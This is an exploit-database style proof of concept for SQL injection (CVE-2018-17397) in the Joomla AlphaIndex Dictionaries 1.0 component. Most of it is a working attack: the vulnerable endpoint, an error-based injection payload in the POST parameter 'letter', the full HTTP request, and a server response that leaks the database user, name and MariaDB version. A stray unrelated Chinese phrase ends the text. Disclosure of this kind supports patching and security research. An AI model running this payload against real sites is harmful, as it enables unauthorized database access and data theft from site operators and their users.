# # # # # # Exploit Title: Joomla! Component AlphaIndex Dictionaries 1.0 - SQL Injection # Dork: N/A # Date: 2018-09-24 # Vendor Homepage: http://multiplanet.gr/ # Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/alphaindex-dictionaries/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-17397 # # # # # # Exploit Author: Ihsan Sencan # # # # # # POC: # # 1) # http://localhost/[PATH]/index.php?option=com_aindexdictionaries&task=getArticlesPreview # # Parameter: letter=[SQL] (POST) # # Payload: " AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66 ,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VerAyari # #POST /alphaindex-dictionaries/index.php?option=com_aindexdictionaries&task=getArticlesPreview HTTP/1.1 #Host: localhost #User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0 #Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 #Accept-Language: en-US,en;q=0.5 #Accept-Encoding: gzip, deflate #Cookie: 4d2a26b1a22184c44838ed58a1427b57=a5ebafd40988be7421846f2e1a496b61 #Connection: keep-alive #Upgrade-Insecure-Requests: 1 #Content-Type: application/x-www-form-urlencoded #Content-Length: 200 # #letter=" AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66 ,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VerAyari #HTTP/1.1 500 Duplicate entry 'multipla_multi@localhost : multipla_dictionary : 10.2.17-MariaDB' for key 'group_key' SQL=SELECT ............. #Server: nginx admin #Date: Mon, 17 Sep 2018 16:15:28 GMT #Content-Type: text/html; charset=utf-8 #Transfer-Encoding: chunked #Connection: keep-alive #Cache-Control: no-cache #Pragma: no-cache # # # # #
体验盒子
